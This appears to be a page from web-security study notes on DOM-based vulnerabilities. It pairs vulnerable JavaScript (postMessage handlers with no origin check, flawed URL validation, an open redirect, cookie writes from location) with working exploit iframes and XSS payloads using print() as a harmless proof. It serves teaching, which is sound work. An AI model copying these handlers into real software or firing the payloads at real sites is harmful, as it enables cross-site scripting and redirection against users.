DOM-based

Taint-flow

Sources Sinks

Web messages

If a website handles web message in an unsafe way, e.g. by not verifying the origin, code in the event listener become potential sinks.

Example 1 (no validation)

Vulnerable code

<script>
    window.addEventListener('message', function(e) {
        document.getElementById('name').innerHTML = e.data;
    })
</script>

Exploit

<iframe src="https://vulnerable-site.com" onload="this.contentWindow.postMessage('<img src=x onerror=print()>','*')">

Example 2 (broken URL validation)

Vulnerable code

<script>
	window.addEventListener('message', function(e) {
	    var url = e.data;
	    if (url.indexOf('http:') > -1 || url.indexOf('https:') > -1) {
	        location.href = url;
	    }
	}, false);
</script>

Exploit

<iframe src="https://vulnerable-site.com" onload="this.contentWindow.postMessage('javascript:print()//https:','*')">

Open redirect

Vulnerable code

<a href='#' onclick='returnUrl = /url=(https?:\/\/.+)/.exec(location); if(returnUrl)location.href = returnUrl[1]; else location.href = "/"'>Back</a>

Exploit

https://vulnerable-website.com/?url=https://attacker-site.com

Cookie manipulation

Vulnerable code

<a href='https://website.com/product?productId=2'>Last viewed product</a>

<script>
	document.cookie = 'lastViewedProduct=' + window.location + '; SameSite=None; Secure'
</script>

Exploit

<iframe src="https://website.com/product?productId=2#'><script>print()</script>"></iframe>

DOM clobbering

Other DOM-based vulnerabilities

PreviousInsecure deserializationNextWebSockets

Last updated